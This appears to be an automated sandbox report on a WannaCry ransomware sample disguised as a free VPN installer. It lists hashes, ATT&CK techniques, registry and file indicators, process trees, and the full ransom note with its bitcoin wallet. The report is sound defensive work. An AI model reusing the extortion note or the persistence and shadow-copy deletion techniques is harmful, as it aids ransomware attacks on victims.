wannacry | d69299761308057d6288300f98222484af40c1ebc98432bcbcc9c737ac219245

Resubmissions

13-08-2024 08:41

240813-klh2nstfje 10

13-08-2024 08:34

13-08-2024 08:31

13-08-2024 08:22

13-08-2024 08:15

13-08-2024 08:11

13-08-2024 08:07

Analysis

max time kernel
338s
max time network
337s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
13-08-2024 08:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

free-vpn-3.2-installer_96-miv1.exe
Size

1.7MB
MD5

2798a45b6137fdc262bc01d6c13a2c7d
SHA1

743587eb5afd358591146b8222d2b97d82cb9d1f
SHA256

d69299761308057d6288300f98222484af40c1ebc98432bcbcc9c737ac219245
SHA512

4c8b70261ec5fe915b2c3dcfb6ff644873adcf0d8abb1ba83be30eb600bf1c7fbd6bbd5d0730a610f129e3492517e7cd77e882e9f7b3bfa214e73bfbd361be1b
SSDEEP

24576:W7FUDowAyrTVE3U5F/XkbjztjfSKh7P/1Ks6vk9XpSwR1HNmJrFxgzUsYz:WBuZrEUcztdqAXpSwRWNQ9Y

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6674.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD668A.tmp	WannaCry.EXE

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4696	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\olcfvlzcexhkc292 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

Downloads MZ/PE file
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
43	camo.githubusercontent.com
53	raw.githubusercontent.com
54	camo.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Free VPN\unins000.dat	free-vpn-3.2-installer.tmp
File opened for modification	C:\Program Files (x86)\Free VPN\freevpn.exe	free-vpn-3.2-installer.tmp
File created	C:\Program Files (x86)\Free VPN\unins000.dat	free-vpn-3.2-installer.tmp
File created	C:\Program Files (x86)\Free VPN\is-G0Q1R.tmp	free-vpn-3.2-installer.tmp
File created	C:\Program Files (x86)\Free VPN\is-S6LDT.tmp	free-vpn-3.2-installer.tmp

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Executes dropped EXE 26 IoCs

pid	Process
4336	free-vpn-3.2-installer_96-miv1.tmp
4400	free-vpn-3.2-installer.exe
2964	free-vpn-3.2-installer.tmp
4332	freevpn.exe
2892	WannaCry.EXE
3064	taskdl.exe
5404	@[email protected]
5464	@[email protected]
5616	taskhsvc.exe
5752	@[email protected]
6052	@[email protected]
6084	taskdl.exe
6104	taskse.exe
6112	@[email protected]
4864	taskdl.exe
552	taskse.exe
4416	@[email protected]
5280	taskse.exe
5316	@[email protected]
5340	taskdl.exe
5116	taskse.exe
6120	@[email protected]
6128	taskdl.exe
2328	taskse.exe
2772	@[email protected]
4652	taskdl.exe

Loads dropped DLL 9 IoCs

pid	Process
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	free-vpn-3.2-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	free-vpn-3.2-installer_96-miv1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	free-vpn-3.2-installer_96-miv1.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	free-vpn-3.2-installer.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	free-vpn-3.2-installer_96-miv1.tmp
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	free-vpn-3.2-installer_96-miv1.tmp

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133680105618921962"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "201"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1735401866-3802634615-1355934272-1000\{2AB2C8A0-2F99-41CB-81F7-F0EAE97C3841}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4104	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
2964	free-vpn-3.2-installer.tmp
2964	free-vpn-3.2-installer.tmp
4720	msedge.exe
4720	msedge.exe
1496	msedge.exe
1496	msedge.exe
3076	identity_helper.exe
3076	identity_helper.exe
2352	msedge.exe
2352	msedge.exe
3788	msedge.exe
3788	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
3824	msedge.exe
3824	msedge.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
5616	taskhsvc.exe
3212	msedge.exe
3212	msedge.exe
228	msedge.exe
228	msedge.exe
3728	identity_helper.exe
3728	identity_helper.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5752	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeDebugPrivilege	4332	freevpn.exe
Token: 33	4332	freevpn.exe
Token: SeIncBasePriorityPrivilege	4332	freevpn.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeIncreaseQuotaPrivilege	5828	WMIC.exe
Token: SeSecurityPrivilege	5828	WMIC.exe
Token: SeTakeOwnershipPrivilege	5828	WMIC.exe
Token: SeLoadDriverPrivilege	5828	WMIC.exe
Token: SeSystemProfilePrivilege	5828	WMIC.exe
Token: SeSystemtimePrivilege	5828	WMIC.exe
Token: SeProfSingleProcessPrivilege	5828	WMIC.exe
Token: SeIncBasePriorityPrivilege	5828	WMIC.exe
Token: SeCreatePagefilePrivilege	5828	WMIC.exe
Token: SeBackupPrivilege	5828	WMIC.exe
Token: SeRestorePrivilege	5828	WMIC.exe
Token: SeShutdownPrivilege	5828	WMIC.exe
Token: SeDebugPrivilege	5828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5828	WMIC.exe
Token: SeRemoteShutdownPrivilege	5828	WMIC.exe
Token: SeUndockPrivilege	5828	WMIC.exe
Token: SeManageVolumePrivilege	5828	WMIC.exe
Token: 33	5828	WMIC.exe
Token: 34	5828	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4336	free-vpn-3.2-installer_96-miv1.tmp
2964	free-vpn-3.2-installer.tmp
4964	chrome.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
1496	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
5404	@[email protected]
5404	@[email protected]
5464	@[email protected]
5464	@[email protected]
5752	@[email protected]
5752	@[email protected]
6052	@[email protected]
6112	@[email protected]
4416	@[email protected]
5316	@[email protected]
6120	@[email protected]
2772	@[email protected]
1008	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3448 wrote to memory of 4336	3448	free-vpn-3.2-installer_96-miv1.exe	78
PID 3448 wrote to memory of 4336	3448	free-vpn-3.2-installer_96-miv1.exe	78
PID 3448 wrote to memory of 4336	3448	free-vpn-3.2-installer_96-miv1.exe	78
PID 4964 wrote to memory of 3880	4964	chrome.exe	82
PID 4964 wrote to memory of 3880	4964	chrome.exe	82
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 4700	4964	chrome.exe	83
PID 4964 wrote to memory of 2264	4964	chrome.exe	84
PID 4964 wrote to memory of 2264	4964	chrome.exe	84
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85
PID 4964 wrote to memory of 1544	4964	chrome.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2952	attrib.exe
5000	attrib.exe

C:\Users\Admin\AppData\Local\Temp\free-vpn-3.2-installer_96-miv1.exe
"C:\Users\Admin\AppData\Local\Temp\free-vpn-3.2-installer_96-miv1.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3448
- C:\Users\Admin\AppData\Local\Temp\is-LAG1M.tmp\free-vpn-3.2-installer_96-miv1.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-LAG1M.tmp\free-vpn-3.2-installer_96-miv1.tmp" /SL5="$50268,837551,832512,C:\Users\Admin\AppData\Local\Temp\free-vpn-3.2-installer_96-miv1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  PID:4336
- - C:\Users\Admin\Downloads\free-vpn-3.2-installer.exe
    "C:\Users\Admin\Downloads\free-vpn-3.2-installer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\is-UEPGK.tmp\free-vpn-3.2-installer.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-UEPGK.tmp\free-vpn-3.2-installer.tmp" /SL5="$70176,151338,54272,C:\Users\Admin\Downloads\free-vpn-3.2-installer.exe"
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2964
    - - C:\Program Files (x86)\Free VPN\freevpn.exe
        
        "C:\Program Files (x86)\Free VPN\freevpn.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0167cc40,0x7ffb0167cc4c,0x7ffb0167cc58
  2⤵
  PID:3880
- C:\Program Files\Google\Chrome\Application\chrome.exe
